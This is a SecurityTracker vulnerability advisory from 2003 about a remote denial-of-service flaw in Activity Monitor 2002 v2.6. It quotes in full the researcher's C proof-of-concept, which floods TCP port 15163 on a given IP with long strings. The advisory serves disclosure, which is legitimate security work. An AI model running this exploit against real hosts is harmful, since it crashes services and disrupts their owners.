SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Activity Monitor Vendors:   SoftActivity.com
Activity Monitor 2002 Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006883
SecurityTracker URL:  http://securitytracker.com/id/1006883
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 30 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Activity Monitor 2002, version 2.6
Description:   A denial of service vulnerability was reported in Activity Monitor 2002. A remote user can cause the application to consume CPU resources or crash.

It is reported that a remote user can connect to the application via TCP port 15163 and send a long string to cause the application to consume excessive CPU resources on the target server or crash.

A demonstration exploit script is provided in the Source Message.

Impact:   A remote user can cause the application to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.softactivity.com/employee-monitoring.asp (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Activity Monitor 2002 remote Denial of Service




Overview: "Activity Monitor 2002 is a monitoring software system for real 
time employee
          monitoring and continuous tracking of users activities on 
networked computers."
	  More information can be found at www.softactivity.com


Vulnerability Description: By connecting TCP port 15163 and sending a long 
string, a remote
			   attacker could cause the application to crash 
and exhaust CPU
			   resources.


Affected Software: Activity Monitor 2002 ver. 2.6



Exploit:

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>



int main(int argc, char **argv)
{

  int i,ck,port,sd;
  char dos[10000];

  struct sockaddr_in act_mon_server;

  if(argc < 2)
  { 
    printf("\nUsage: %s <ip>\n", argv[0]);
    exit(0);
  }
  
  port = 15163;
    
  for(i = 0; i < 10000; i++) dos[i] = 'x';
  
  act_mon_server.sin_family = AF_INET;
  act_mon_server.sin_port = htons((u_short)port);
  act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);
   
  sd = socket(AF_INET, SOCK_STREAM, 0);
  
  ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof
(act_mon_server)); 
  
  if(ck != 0) { 
    perror("Connect");
    exit(0);
    }
  
  printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");
  printf("\t\tby Luca Ercoli luca.ercoli@inwind.it\n\n");

  write(sd, dos, sizeof(dos)); 
  write(sd, dos, sizeof(dos));
  write(sd, dos, sizeof(dos));
  
  printf("\nDoS sent!\n");
  
  close(sd);

  exit(0);
}

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC